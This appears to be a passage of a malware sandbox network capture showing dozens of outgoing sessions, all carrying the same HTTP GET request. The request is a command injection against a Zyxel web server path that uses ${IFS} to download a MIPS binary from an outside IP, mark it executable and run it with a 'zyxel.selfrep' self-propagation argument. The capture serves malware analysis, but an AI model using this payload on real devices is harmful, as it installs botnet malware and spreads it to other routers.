                                                Jan 12, 2024 18:24:25.590085983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1778192.168.2.1340028170.246.126.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.590118885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1779192.168.2.1358316167.13.140.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.590146065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1780192.168.2.1345038210.93.119.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.590188980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1781192.168.2.1357252113.124.159.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.590209961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1782192.168.2.134767884.27.235.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.590262890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1783192.168.2.1337816111.34.97.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.590297937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1784192.168.2.1352026118.255.76.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.590348959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1785192.168.2.135949260.25.215.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.590383053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1786192.168.2.1360856135.146.81.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.590415001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1787192.168.2.1349398107.176.33.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.590451956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1788192.168.2.135096663.83.98.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.590473890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1789192.168.2.135561684.40.228.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.590537071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1790192.168.2.1345940165.99.146.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.590568066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1791192.168.2.1349418100.236.229.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.590600967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1792192.168.2.1335070145.82.113.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.590663910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1793192.168.2.135512895.19.39.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.590672970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1794192.168.2.1345814185.100.118.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.590738058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1795192.168.2.1346762112.212.105.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.590763092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1796192.168.2.1337496163.255.209.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.590810061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1797192.168.2.1352086202.237.73.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.590840101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1798192.168.2.133801272.196.229.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.590879917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1799192.168.2.134295818.49.61.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.590909958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1800192.168.2.1345718166.126.4.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.590944052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1801192.168.2.1334650199.235.105.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.590965986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1802192.168.2.135969078.34.147.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.591010094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1803192.168.2.134107463.110.30.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.591041088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1804192.168.2.1336062211.231.63.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.591105938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1805192.168.2.1334802183.111.173.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.591128111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1806192.168.2.1346304149.44.69.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.591155052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1807192.168.2.133959692.202.247.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.591209888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1808192.168.2.134008873.207.3.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.591229916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1809192.168.2.134533212.106.238.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.591305971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1810192.168.2.134234876.237.75.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.591325998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1811192.168.2.1357180166.66.20.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.591372967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1812192.168.2.134604899.192.53.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.591418028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1813192.168.2.1340638203.16.238.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.591460943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1814192.168.2.1343798140.150.53.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.591489077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1815192.168.2.133380437.118.178.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.591509104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1816192.168.2.134681890.83.77.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.591561079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1817192.168.2.133457245.149.120.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.591597080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1818192.168.2.133636499.100.17.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.591641903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1819192.168.2.1357718198.132.124.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.591674089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1820192.168.2.134035878.170.235.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.591690063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1821192.168.2.1351308185.172.47.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.591732025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1822192.168.2.1345900108.197.121.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.591782093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1823192.168.2.1333632199.210.2.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.591836929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1824192.168.2.1341340160.154.226.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.591876984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1825192.168.2.1340106196.127.137.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.591909885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1826192.168.2.1332838135.228.39.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.591939926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1827192.168.2.1340542105.59.69.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.591994047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1828192.168.2.134172451.26.153.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.592062950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1829192.168.2.1338010162.152.200.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.592070103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1830192.168.2.1337620209.166.109.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.592132092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1831192.168.2.1344880198.135.98.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.592158079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1832192.168.2.134375425.74.4.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.592191935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1833192.168.2.133354479.74.125.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.592245102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1834192.168.2.133871447.70.152.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.592282057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1835192.168.2.135747492.27.112.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.592333078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1836192.168.2.1336036185.42.190.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.592350006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1837192.168.2.1333850191.162.178.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.592375040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1838192.168.2.13435442.225.73.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.592411041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1839192.168.2.1348124218.67.42.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:25.592459917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1840192.168.2.135177078.147.4.87443
                                                TimestampBytes transferredDirectionData
